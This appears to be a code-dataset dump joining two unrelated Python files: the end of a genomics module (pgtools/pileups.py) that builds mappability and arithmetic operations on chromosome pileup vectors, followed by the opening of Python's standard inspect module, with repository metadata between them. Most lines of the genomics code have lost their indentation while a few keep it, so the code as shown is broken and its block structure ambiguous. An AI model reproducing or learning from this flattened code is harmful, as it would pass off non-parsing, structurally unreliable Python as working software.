self._initialize()
missing_query_chroms = set([])
missing_ref_chroms = set([])
mapped_counter = 0
for query_chrom in best_intervals:
if len(best_intervals[query_chrom]) > 0:
# print query_chrom, len(self.pileups[query_chrom])
if from_or_to == 'from' or query_chrom in self.pileups:
print(('\tComputing mappability for source chromosome {} with {} intervals'.format(query_chrom, len(
best_intervals[query_chrom]))))
start_time = datetime.datetime.now()
interval_counter = 0
for interval_idx, interval in enumerate(best_intervals[query_chrom]):
# if interval_idx % REPORTING_INTERVAL == 0:
# _print(
# 'Processing interval {} of {}'.format(interval_idx + 1,
# len(best_intervals[query_chrom])),
# 3)
query_start, query_end, ref_chrom, ref_offset, interval_polarity = interval
if from_or_to == 'from':
if ref_chrom in self.pileups:
self.pileups[ref_chrom][query_start + ref_offset:query_end + ref_offset] += 1
# print self.pileups[ref_chrom][query_start + ref_offset:query_end+ ref_offset]
else:
missing_ref_chroms.add(ref_chrom)
else:
self.pileups[query_chrom][query_start:query_end] += 1
interval_counter += 1
mapped_counter += query_end - query_start
print(
('\t\tDone with chromosome {} in {}'.format(query_chrom, datetime.datetime.now() - start_time)))
else:
print(('\tQuery chromosome {} not in self'.format(query_chrom)))
missing_query_chroms.add(query_chrom)
else:
print(('\tQuery chromosome {} has no mapped intervals, skipping'.format(query_chrom)))
if missing_query_chroms:
print(('The following chromosomes in the interval file were missing in the query: {}'.format(
', '.join(sorted(list(missing_query_chroms))))))
if missing_ref_chroms:
print(('The following chromosomes in the interval file were missing in the reference: {}'.format(
', '.join(sorted(list(missing_ref_chroms))))))
print(('Done computing mappability of {} {} {} in {}.'.format(self.build, from_or_to, other_build,
datetime.datetime.now() - overall_start_time)))
        self_covered_loci = self.flatten().astype(numpy.int64).sum()
print((self_covered_loci, self.genome_size))
print(('Mappings processed for {} loci, covering {} of self ({} of total)'.format(mapped_counter,
self_covered_loci,
self_covered_loci / float(
self.genome_size))))
print()
def mappabilityFromMappingTable(self, mapping_table_filename, from_or_to='from'):
"""
if <from_or_to> = 'from':
Populate self with a vector counting how many loci in the source organism map
to loci in self, given a mapping table in <mapping_table_filename>
if <from_or_to> = 'to':
Populate self with a vector counting how many loci in self map
to loci in the source organism, given a mapping table in <mapping_table_filename>
"""
# Field positions
CHROM_FIELD = 0
DESTINATION_FRAG_START = 4
DESTINATION_INSERTION = 5
DESTINATION_FRAG_END = 6
SOURCE_FRAG_START = 8
SOURCE_INSERTION = 9
SOURCE_FRAG_END = 10
self._initialize()
start_time = datetime.datetime.now()
with open(mapping_table_filename, 'rt') as mapping_table:
table_reader = csv.reader(mapping_table, dialect=csv.excel_tab)
for line_num, line in enumerate(table_reader):
# remember mapping table is 1-based
if line_num % 100000 == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if line[SOURCE_FRAG_START] != line[SOURCE_FRAG_END]:
# print line
chrom = toolbox.convert_chroms(line[CHROM_FIELD], dest=self.chromosome_dialect)
if chrom not in self.pileups:
warning_message = 'Found chromosome {} in mapping table but no record of it in {}.'.format(
chrom, self.build)
                        print('Warning: {}'.format(warning_message))
break
# raise Exception(warning_message)
dest_frag_start = int(line[DESTINATION_FRAG_START]) - 1
dest_frag_end = int(line[DESTINATION_FRAG_END]) + 1
source_frag_start = int(line[SOURCE_FRAG_START]) - 1
source_frag_end = int(line[SOURCE_FRAG_END]) + 1
if line[DESTINATION_INSERTION] == r'\N' and line[SOURCE_INSERTION] == r'\N':
if source_frag_end - source_frag_start != dest_frag_end - dest_frag_start:
raise Exception(
'Source ({} bp) and destination ({} bp) fragments not the same size on line {}'.format(
source_frag_end - source_frag_start, dest_frag_end - dest_frag_start, line_num))
else:
try:
if from_or_to == 'from':
self.pileups[chrom][dest_frag_start:dest_frag_end] += 1
else:
self.pileups[chrom][source_frag_start:source_frag_end] += 1
except ValueError as ve:
                            print('Unequal fragment sizes have slipped through on line {}. '
                                  'May be a chromosome size mismatch.'.format(line_num))
                            print('Source: {} {} {}, destination: {} {} {}'.format(
                                source_frag_start, source_frag_end, source_frag_end - source_frag_start,
                                dest_frag_start, dest_frag_end, dest_frag_end - dest_frag_start))
                            print('chrom: {}'.format(chrom))
raise ve
        print('Done in {}'.format(datetime.datetime.now() - start_time))
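    # Illustrative usage sketch (added note, not part of the original module): assuming
    # `pu` is a Pileups object built on the destination assembly of the mapping table,
    # a call like the one below would mark every destination locus covered by at least
    # one mapped fragment.  The file path and variable names are hypothetical.
    #
    #   pu = Pileups(chrom_lengths, build='mm9')
    #   pu.mappabilityFromMappingTable('/path/to/mapping_table.tsv', from_or_to='from')
    #   covered_fraction = pu.flatten().astype(bool).sum() / float(pu.genome_size)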
def mappabilityFromChain_old(self, chain_file_basepath, other_build, from_or_to='from', use_score=False):
"""
Populate with a 'mappability' vector derived from <chain_filename> that
indicates the mappability of each locus in itself to the other species.
If <use_score> is false, each locus will be 1 if mappable from the
reference species, 0 otherwise.
If <use_score> is true, each locus will contain the log10 value of the
score field for the chain that maps to it, 0 otherwise.
A note about chain files: The files are named in the form
ReferenceToQuery, which is counter to my intuition, at least.
So the build of this pileups object should match the reference build of
the chain file being used (the first build in the filename)
"""
start_time = datetime.datetime.now()
header_fields = (
'dummy', 'score', 'tName', 'tSize', 'tStrand', 'tStart', 'tEnd', 'qName', 'qSize', 'qStrand', 'qStart',
'qEnd',
'id')
from_or_to = from_or_to.lower()
assert from_or_to in ('from', 'to')
        print('Populating with vector of mappability ({}) {} {}'.format(
            ('binary', 'log10_score')[use_score], from_or_to, other_build))
if from_or_to == 'from':
ref_build = other_build
query_build = self.build
else:
ref_build = self.build
query_build = other_build
chain_filename = os.path.join(chain_file_basepath, '{}To{}.over.chain'.format(toolbox.first_lower(ref_build),
toolbox.first_upper(query_build)))
        print('Using chain file: {}'.format(chain_filename))
with open(chain_filename, 'rt') as chain_file:
self._initialize()
new_chain = True
good_chain = False
mapped_count = 0
# total_ref = 0
# total_query = 0
for line_num, line in enumerate(chain_file):
# new chain
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if new_chain and line != '\n': # insurance against multiple blank lines
header = toolbox.parse_line_dict(line, header_fields, split_char=' ', strict=True)
assert header['dummy'] == 'chain'
new_chain = False
# relative offsets within the chain
ref_chain_pos = 0
query_chain_pos = 0
ref_chrom = toolbox.convert_chroms(header['tName'], dest=self.chromosome_dialect)
query_chrom = toolbox.convert_chroms(header['qName'], dest=self.chromosome_dialect)
ref_size = int(header['tSize'])
query_size = int(header['qSize'])
# total_ref += ref_size
# total_query += query_size
good_chain = False
if from_or_to == 'from':
if query_chrom in self.pileups:
assert query_size == len(self.pileups[query_chrom])
good_chain = True
else:
if ref_chrom in self.pileups:
assert ref_size == len(self.pileups[ref_chrom])
good_chain = True
# print ref_chrom, query_chrom, good_chain
ref_chain_start = int(header['tStart'])
query_chain_start = int(header['qStart'])
elif line == '\n':
# start a new chain on the next line
new_chain = True
elif good_chain:
# it must be a data line
split_line = line.split('\t')
size = int(split_line[0])
if len(split_line) == 3:
ref_diff = int(split_line[1])
query_diff = int(split_line[2])
elif len(split_line) == 1:
ref_diff = 0
query_diff = 0
else:
raise Exception(
'Encountered a chain alignment data line of length 2 on line {}. Unsure how to handle this.'.format(
line_num))
ref_start_pos = ref_chain_start + ref_chain_pos
ref_end_pos = ref_start_pos + size
ref_chain_pos += size + ref_diff
query_start_pos = query_chain_start + query_chain_pos
query_end_pos = query_start_pos + size
query_chain_pos += size + query_diff
mapped_count += size
if use_score:
score = math.log10(int(header['score']))
else:
score = 1
if from_or_to == 'from':
self.pileups[query_chrom][query_start_pos:query_end_pos] += score
else:
self.pileups[ref_chrom][ref_start_pos:ref_end_pos] += score
        print('Done in {}.'.format(datetime.datetime.now() - start_time))
        # numpy.int was a deprecated alias for the builtin int; use int directly
        self_covered_loci = self.flatten().astype(int).sum()
        print('Mappings processed for {} loci, covering {} of self ({} of total)'.format(
            mapped_count, self_covered_loci, self_covered_loci / float(self.genome_size)))
def copy(self, dtype=None):
"""
Alias for deepCopy()
:param dtype:
:return:
"""
if not dtype:
dtype = self.pileup_dtype
return self.deepCopy(dtype)
def deepCopy(self, dtype=None):
"""
Returns a new pileups object containing the same data (a deep copy) with an optional change of datatype.
:param other:
:return:
"""
if not dtype:
dtype = self.pileup_dtype
new_pu = self.emptyCopy()
# print 'Creating deep copy of {}'.format(self.name)
for chrom in self.pileups:
# print '\t{}'.format(chrom)
new_pu.pileups[chrom] = self.pileups[chrom].astype(dtype=dtype)
return new_pu
def shallowCopy(self):
new_pu = self.emptyCopy()
# print 'Creating shallow copy of {}'.format(self.name)
for chrom in self.pileups:
new_pu.pileups[chrom] = self.pileups[chrom]
return new_pu
def emptyCopy(self):
"""
Returns a new pileups object containing the same meta-data but with no pileups data
:return:
"""
# print 'Creating empty copy of {}'.format(self.name)
new_pu = Pileups(self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pu.pileups = {}
new_pu.is_normalized = self.is_normalized
# new_pu.genome_size = self.genome_size
new_pu.coverage = self.coverage
# new_pu.max_height = self.max()
new_pu.total_reads = self.total_reads
new_pu.mean_read_length = self.mean_read_length
new_pu.mode_read_length = self.mode_read_length
new_pu.pileup_dtype = self.pileup_dtype
return new_pu
def apply(self, func):
for chrom in self.pileups:
self.pileups[chrom] = func(self.pileups[chrom])
def toType(self, pileup_dtype=PILEUP_DTYPE):
"""
Converts all pileup chromosome vectors to the specified data type
:param pileup_dtype:
:return:
"""
self.pileup_dtype = pileup_dtype
for chrom in self.pileups:
self.pileups[chrom] = self.pileups[chrom].astype(pileup_dtype)
def astype(self, pileup_dtype=PILEUP_DTYPE):
"""
Analogous to the numpy.astype() method, returns a new pileup
with chromosome data in the specified data type.
:param pileup_dtype:
:return:
"""
new_pileup = self.emptyCopy()
new_pileup.pileup_dtype = pileup_dtype
for chrom in self.pileups:
new_pileup.pileups[chrom] = self.pileups[chrom].astype(pileup_dtype)
return new_pileup
def memMap(self, writable=True, tmp_dir=NETWORK_TMP_DIR):
"""
Converts pileup chromosome vectors to mem_mapped arrays on disk.
"""
self.save_path = os.path.join(tmp_dir, 'pileup_{}'.format(self.id))
print('Saving to {} in mem mapped mode. Writable: {}'.format(self.save_path, writable))
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
max_chroms_to_map = min(len(self.pileups), MAX_FILEHANDLES_PER_PILEUP)
        # Memory-map the largest chromosomes first: sort by vector length rather than by
        # the length of the chromosome name string.
        for chrom in sorted(self.pileups, key=lambda x: len(self.pileups[x]), reverse=True)[:max_chroms_to_map]:
vector_fname = os.path.join(self.save_path, '{}.npy'.format(chrom))
numpy.save(vector_fname, self.pileups[chrom])
self.pileups[chrom] = numpy.load(vector_fname, mmap_mode=('r', 'r+')[writable])
def ceil(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.ceil(self.pileups[chrom])
return result
def floor(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.floor(self.pileups[chrom])
return result
def round(self, decimals=0):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.round(self.pileups[chrom], decimals=decimals)
return result
def logical_and(self, other):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.pileups:
if chrom in other.pileups:
                result.pileups[chrom] = numpy.logical_and(self.pileups[chrom], other.pileups[chrom])
return result
def logical_or(self, other):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.pileups:
if chrom in other.pileups:
                result.pileups[chrom] = numpy.logical_or(self.pileups[chrom], other.pileups[chrom])
return result
def logical_not(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.pileups:
result.pileups[chrom] = numpy.logical_not(self.pileups[chrom])
return result
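    # Illustrative sketch (added note, not part of the original module): the boolean
    # helpers above can be combined to ask which loci are covered in two experiments at
    # once.  `pu_a` and `pu_b` are hypothetical Pileups objects on the same build.
    #
    #   jointly_covered = pu_a.nonzero().logical_and(pu_b.nonzero())
    #   n_joint = jointly_covered.flatten().astype(int).sum()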
@property
def max(self):
"""
Maximum value contained in any chromosome
:return:
"""
self.max_height = float('-Inf')
for chrom in self.pileups:
self.max_height = max(self.max_height, max(self.pileups[chrom]))
return self.max_height
def fill(self, value):
"""
Fill up the chromosome arrays with <value>
"""
        print('Filling chromosome vectors with {}'.format(value))
self._initialize()
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.full(self.chrom_lengths[chrom], value, dtype=float)
print('Done.')
def nonzero(self):
"""
Returns a new pileup object consisting of boolean vectors marking whether or not a position was 0 in the parent
pileup object
"""
new_pileups = self.copy()
for chrom in new_pileups.pileups:
new_pileups.pileups[chrom] = numpy.greater(self.pileups[chrom], 0)
return new_pileups
def threshold(self, min_value=None, max_value=None):
"""
Returns a new pileup object where every value less than <min_value> or greater than <max_value>
has been replaced by 0
:param min_value:
:param max_value:
:return:
"""
print('Replacing all values {}{}{} with 0'.format(('', 'below {}'.format(min_value))[bool(min_value)],
('', ' or ')[bool(min_value) and bool(max_value)],
('', 'above {}'.format(max_value))[bool(max_value)]))
new_pileups = self.copy()
for chrom in new_pileups.pileups:
print('\tProcessing chromosome {} ...'.format(chrom))
new_pileups.pileups[chrom] = self.pileups[chrom][:]
if min_value is not None:
new_pileups.pileups[chrom] *= numpy.greater(self.pileups[chrom], min_value).astype(float)
if max_value is not None:
new_pileups.pileups[chrom] *= numpy.less(self.pileups[chrom], max_value).astype(float)
return new_pileups
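    # Illustrative sketch (added note, not part of the original module): threshold()
    # zeroes values outside a window, so a crude coverage mask could be built like this.
    # The cutoff values are made up for the example.
    #
    #   background_removed = pu.threshold(min_value=5)           # drop low coverage
    #   mid_range = pu.threshold(min_value=5, max_value=1000)    # also drop artefact spikes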
def __iadd__(self, other):
try:
assert self.build == other.build
self.name = '({}+{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] += other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}+{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.add(self.pileups[chrom], other)
return self
def __isub__(self, other):
try:
assert self.build == other.build
self.name = '({}-{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] -= other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}-{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.subtract(self.pileups[chrom], other)
return self
def __imul__(self, other):
try:
# type(other) == type(self):
assert self.build == other.build
self.name = '({}*{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] *= other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}*{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.multiply(self.pileups[chrom], other)
return self
def __idiv__(self, other):
try:
assert self.build == other.build
self.name = '({}/{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
self.pileups[chrom] /= other.pileups[chrom]
self.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
self.name = '({}/{})'.format(self.name, other)
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.divide(self.pileups[chrom], other)
        return self

    # Python 3 dispatches the /= operator to __itruediv__, so alias it to the
    # implementation above (this file was converted from Python 2, which used __idiv__).
    __itruediv__ = __idiv__
def __add__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}+{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] + other.pileups[chrom]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.pileups:
result.pileups[chrom] = numpy.add(self.pileups[chrom], other)
result.name = '({}+{})'.format(self.name, other)
return result
def __sub__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}-{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] - other.pileups[chrom]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError):
for chrom in self.pileups:
result.pileups[chrom] = numpy.subtract(self.pileups[chrom], other)
result.name = '({}-{})'.format(self.name, other)
return result
def __mul__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}*{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
# if chrom in other.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] * other.pileups[chrom]
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError) as ex:
print(ex)
for chrom in self.pileups:
result.pileups[chrom] = numpy.multiply(self.pileups[chrom], other)
result.name = '({}*{})'.format(self.name, other)
return result
def __div__(self, other):
result = self.emptyCopy()
try:
assert self.build == other.build
result.name = '({}/{})'.format(self.name, other.name)
for chrom in self.chrom_lengths:
# if chrom in other.chrom_lengths:
assert len(self.pileups[chrom]) == len(other.pileups[chrom])
result.pileups[chrom] = self.pileups[chrom] / other.pileups[chrom].astype(float)
result.is_normalized = self.is_normalized and other.is_normalized
except (AttributeError, ValueError) as ex:
print(ex)
for chrom in self.pileups:
result.pileups[chrom] = numpy.divide(self.pileups[chrom], float(other))
result.name = '({}/{})'.format(self.name, other)
        return result

    # Python 3 dispatches the / operator to __truediv__, so alias it to the
    # implementation above (this file was converted from Python 2, which used __div__).
    __truediv__ = __div__
def __pos__(self):
return self
def __neg__(self):
negated = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
negated.pileups[chrom] = -self.pileups[chrom]
return negated
def __len__(self):
return self.genome_size
def __abs__(self):
result = Pileups(self.chrom_lengths, build=self.build, name=self.name)
for chrom in self.chrom_lengths:
result.pileups[chrom] = numpy.abs(self.pileups[chrom])
return result
def __repr__(self):
result = 'Pileups object. Name: {}, Build: {}\n'.format(self.name, self.build)
result += 'Chromosome lengths:\n'
for chrom in self.chrom_lengths:
result += '\t{:>40}\t{:>11}\n'.format(chrom, self.chrom_lengths[chrom])
try:
result += 'Data type: {}\n'.format(list(self.pileups.values())[0].dtype)
except Exception:
pass
return result
def pileup_sum(pileup_sequence):
"""
Returns the sum of a sequence of pileup objects
:param pileup_sequence:
:return:
"""
    sum_total = pileup_sequence[0].deepCopy()  # copy first, since __iadd__ modifies the left operand in place
if len(pileup_sequence) > 1:
for pu in pileup_sequence[1:]:
sum_total += pu
return sum_total
def pileup_product(pileup_sequence):
product_total = pileup_sequence[0].deepCopy()
if len(pileup_sequence) > 1:
for pu in pileup_sequence[1:]:
product_total *= pu
return product_total
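# Illustrative sketch (added note, not part of the original module): pileup_sum and
# pileup_product reduce a list of Pileups objects element-wise, e.g. to pool replicates.
# The replicate and mask objects below are hypothetical.
#
#   pooled = pileup_sum([rep1, rep2, rep3])       # per-locus sum of read counts
#   shared = pileup_product([mask_a, mask_b])     # non-zero only where all masks are non-zero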
def test():
import pp_config
schmidt_configs = {'C57B6_mm9': pp_config.read_config('config/schmidt_mouse.txt'),
'human': pp_config.read_config('config/schmidt_human.txt')}
configs = schmidt_configs
control_configs = schmidt_configs
for config in list(configs.values()):
for k in config:
if type(config[k]) == str:
config[k] = config[k].replace('oasis', 'oasis_local')
del config
chroms = {}
for organism in ('C57B6_mm9',):
chroms[organism] = get_chrom_length_dict(
os.path.join(os.environ['HOME'], '.local', 'opt', 'idrCode', 'genome_tables',
'genome_table.{}.txt'.format(configs[organism]['IDR_GENOME_NAME'])))
test1 = Pileups(chrom_lengths=chroms['C57B6_mm9'], build='mm9')
test1.loadFromWig(
'/cellar/users/dskola/oasis_local/wigs/GSM1014195_mm9_wgEncodeUwDnaseLiverC57bl6MAdult8wksSigRep2.wig')
if __name__ == '__main__':
test()
|
phageghost/pg_tools
|
pgtools/pileups.py
|
Python
|
mit
| 198,251
|
[
"Bowtie",
"Gaussian"
] |
578d1b58443ff34f3c0dc82c89b87d268cf75c7c52286e474481de4d4ec72592
|
"""Get useful information from live Python objects.
This module encapsulates the interface provided by the internal special
attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion.
It also provides some help for examining source code and class layout.
Here are some of the useful functions provided by this module:
ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),
isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),
isroutine() - check object types
getmembers() - get members of an object that satisfy a given condition
getfile(), getsourcefile(), getsource() - find an object's source code
getdoc(), getcomments() - get documentation on an object
getmodule() - determine the module that an object came from
getclasstree() - arrange classes so as to represent their hierarchy
getargvalues(), getcallargs() - get info about function arguments
getfullargspec() - same, with support for Python 3 features
formatargvalues() - format an argument spec
getouterframes(), getinnerframes() - get info about frames
currentframe() - get the current stack frame
stack(), trace() - get info about frames on the stack or in a traceback
signature() - get a Signature object for the callable
"""
# This module is in the public domain. No warranties.
__author__ = ('Ka-Ping Yee <ping@lfw.org>',
'Yury Selivanov <yselivanov@sprymix.com>')
import abc
import dis
import collections.abc
import enum
import importlib.machinery
import itertools
import linecache
import os
import re
import sys
import tokenize
import token
import types
import warnings
import functools
import builtins
from operator import attrgetter
from collections import namedtuple, OrderedDict
# Create constants for the compiler flags in Include/code.h
# We try to get them from dis to avoid duplication
mod_dict = globals()
for k, v in dis.COMPILER_FLAG_NAMES.items():
mod_dict["CO_" + v] = k
# See Include/object.h
TPFLAGS_IS_ABSTRACT = 1 << 20
# ----------------------------------------------------------- type-checking
def ismodule(object):
"""Return true if the object is a module.
Module objects provide these attributes:
__cached__ pathname to byte compiled file
__doc__ documentation string
__file__ filename (missing for built-in modules)"""
return isinstance(object, types.ModuleType)
def isclass(object):
"""Return true if the object is a class.
Class objects provide these attributes:
__doc__ documentation string
__module__ name of module in which this class was defined"""
return isinstance(object, type)
def ismethod(object):
"""Return true if the object is an instance method.
Instance method objects provide these attributes:
__doc__ documentation string
__name__ name with which this method was defined
__func__ function object containing implementation of method
__self__ instance to which this method is bound"""
return isinstance(object, types.MethodType)
def ismethoddescriptor(object):
"""Return true if the object is a method descriptor.
But not if ismethod() or isclass() or isfunction() are true.
This is new in Python 2.2, and, for example, is true of int.__add__.
An object passing this test has a __get__ attribute but not a __set__
attribute, but beyond that the set of attributes varies. __name__ is
usually sensible, and __doc__ often is.
Methods implemented via descriptors that also pass one of the other
tests return false from the ismethoddescriptor() test, simply because
the other tests promise more -- you can, e.g., count on having the
__func__ attribute (etc) when an object passes ismethod()."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__get__") and not hasattr(tp, "__set__")
def isdatadescriptor(object):
"""Return true if the object is a data descriptor.
Data descriptors have both a __get__ and a __set__ attribute. Examples are
properties (defined in Python) and getsets and members (defined in C).
Typically, data descriptors will also have __name__ and __doc__ attributes
(properties, getsets, and members have both of these attributes), but this
is not guaranteed."""
if isclass(object) or ismethod(object) or isfunction(object):
# mutual exclusion
return False
tp = type(object)
return hasattr(tp, "__set__") and hasattr(tp, "__get__")
if hasattr(types, 'MemberDescriptorType'):
# CPython and equivalent
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.MemberDescriptorType)
else:
# Other implementations
def ismemberdescriptor(object):
"""Return true if the object is a member descriptor.
Member descriptors are specialized descriptors defined in extension
modules."""
return False
if hasattr(types, 'GetSetDescriptorType'):
# CPython and equivalent
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return isinstance(object, types.GetSetDescriptorType)
else:
# Other implementations
def isgetsetdescriptor(object):
"""Return true if the object is a getset descriptor.
getset descriptors are specialized descriptors defined in extension
modules."""
return False
def isfunction(object):
"""Return true if the object is a user-defined function.
Function objects provide these attributes:
__doc__ documentation string
__name__ name with which this function was defined
__code__ code object containing compiled function bytecode
__defaults__ tuple of any default values for arguments
__globals__ global namespace in which this function was defined
__annotations__ dict of parameter annotations
__kwdefaults__ dict of keyword only parameters with defaults"""
return isinstance(object, types.FunctionType)
def isgeneratorfunction(object):
"""Return true if the object is a user-defined generator function.
Generator function objects provide the same attributes as functions.
See help(isfunction) for a list of attributes."""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_GENERATOR)
def iscoroutinefunction(object):
"""Return true if the object is a coroutine function.
Coroutine functions are defined with "async def" syntax.
"""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_COROUTINE)
def isasyncgenfunction(object):
"""Return true if the object is an asynchronous generator function.
Asynchronous generator functions are defined with "async def"
syntax and have "yield" expressions in their body.
"""
return bool((isfunction(object) or ismethod(object)) and
object.__code__.co_flags & CO_ASYNC_GENERATOR)
def isasyncgen(object):
"""Return true if the object is an asynchronous generator."""
return isinstance(object, types.AsyncGeneratorType)
def isgenerator(object):
"""Return true if the object is a generator.
Generator objects provide these attributes:
__iter__ defined to support iteration over container
close raises a new GeneratorExit exception inside the
generator to terminate the iteration
gi_code code object
gi_frame frame object or possibly None once the generator has
been exhausted
gi_running set to 1 when generator is executing, 0 otherwise
next return the next item from the container
send resumes the generator and "sends" a value that becomes
the result of the current yield-expression
throw used to raise an exception inside the generator"""
return isinstance(object, types.GeneratorType)
def iscoroutine(object):
"""Return true if the object is a coroutine."""
return isinstance(object, types.CoroutineType)
def isawaitable(object):
"""Return true if object can be passed to an ``await`` expression."""
return (isinstance(object, types.CoroutineType) or
isinstance(object, types.GeneratorType) and
bool(object.gi_code.co_flags & CO_ITERABLE_COROUTINE) or
isinstance(object, collections.abc.Awaitable))
def istraceback(object):
"""Return true if the object is a traceback.
Traceback objects provide these attributes:
tb_frame frame object at this level
tb_lasti index of last attempted instruction in bytecode
tb_lineno current line number in Python source code
tb_next next inner traceback object (called by this level)"""
return isinstance(object, types.TracebackType)
def isframe(object):
"""Return true if the object is a frame object.
Frame objects provide these attributes:
f_back next outer frame object (this frame's caller)
f_builtins built-in namespace seen by this frame
f_code code object being executed in this frame
f_globals global namespace seen by this frame
f_lasti index of last attempted instruction in bytecode
f_lineno current line number in Python source code
f_locals local namespace seen by this frame
f_trace tracing function for this frame, or None"""
return isinstance(object, types.FrameType)
def iscode(object):
"""Return true if the object is a code object.
Code objects provide these attributes:
co_argcount number of arguments (not including *, ** args
or keyword only arguments)
co_code string of raw compiled bytecode
co_cellvars tuple of names of cell variables
co_consts tuple of constants used in the bytecode
co_filename name of file in which this code object was created
co_firstlineno number of first line in Python source code
co_flags bitmap: 1=optimized | 2=newlocals | 4=*arg | 8=**arg
| 16=nested | 32=generator | 64=nofree | 128=coroutine
| 256=iterable_coroutine | 512=async_generator
co_freevars tuple of names of free variables
co_kwonlyargcount number of keyword only arguments (not including ** arg)
co_lnotab encoded mapping of line numbers to bytecode indices
co_name name with which this code object was defined
        co_names           tuple of names other than arguments and function locals
co_nlocals number of local variables
co_stacksize virtual machine stack space required
co_varnames tuple of names of arguments and local variables"""
return isinstance(object, types.CodeType)
def isbuiltin(object):
"""Return true if the object is a built-in function or method.
Built-in functions and methods provide these attributes:
__doc__ documentation string
__name__ original name of this function or method
__self__ instance to which a method is bound, or None"""
return isinstance(object, types.BuiltinFunctionType)
def isroutine(object):
"""Return true if the object is any kind of function or method."""
return (isbuiltin(object)
or isfunction(object)
or ismethod(object)
or ismethoddescriptor(object))
def isabstract(object):
"""Return true if the object is an abstract base class (ABC)."""
if not isinstance(object, type):
return False
if object.__flags__ & TPFLAGS_IS_ABSTRACT:
return True
if not issubclass(type(object), abc.ABCMeta):
return False
if hasattr(object, '__abstractmethods__'):
# It looks like ABCMeta.__new__ has finished running;
# TPFLAGS_IS_ABSTRACT should have been accurate.
return False
# It looks like ABCMeta.__new__ has not finished running yet; we're
# probably in __init_subclass__. We'll look for abstractmethods manually.
for name, value in object.__dict__.items():
if getattr(value, "__isabstractmethod__", False):
return True
for base in object.__bases__:
for name in getattr(base, "__abstractmethods__", ()):
value = getattr(object, name, None)
if getattr(value, "__isabstractmethod__", False):
return True
return False
def getmembers(object, predicate=None):
"""Return all members of an object as (name, value) pairs sorted by name.
Optionally, only return members that satisfy a given predicate."""
if isclass(object):
mro = (object,) + getmro(object)
else:
mro = ()
results = []
processed = set()
names = dir(object)
    # Add any DynamicClassAttributes to the list of names if object is a class;
# this may result in duplicate entries if, for example, a virtual
# attribute with the same name as a DynamicClassAttribute exists
try:
for base in object.__bases__:
for k, v in base.__dict__.items():
if isinstance(v, types.DynamicClassAttribute):
names.append(k)
except AttributeError:
pass
for key in names:
# First try to get the value via getattr. Some descriptors don't
# like calling their __get__ (see bug #1785), so fall back to
# looking in the __dict__.
try:
value = getattr(object, key)
# handle the duplicate key
if key in processed:
raise AttributeError
except AttributeError:
for base in mro:
if key in base.__dict__:
value = base.__dict__[key]
break
else:
# could be a (currently) missing slot member, or a buggy
# __dir__; discard and move on
continue
if not predicate or predicate(value):
results.append((key, value))
processed.add(key)
results.sort(key=lambda pair: pair[0])
return results
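# Illustrative example (added note, not part of the stdlib source): getmembers() pairs
# names with values and can be filtered with the is*() predicates defined above.
#
#   >>> import inspect, os.path
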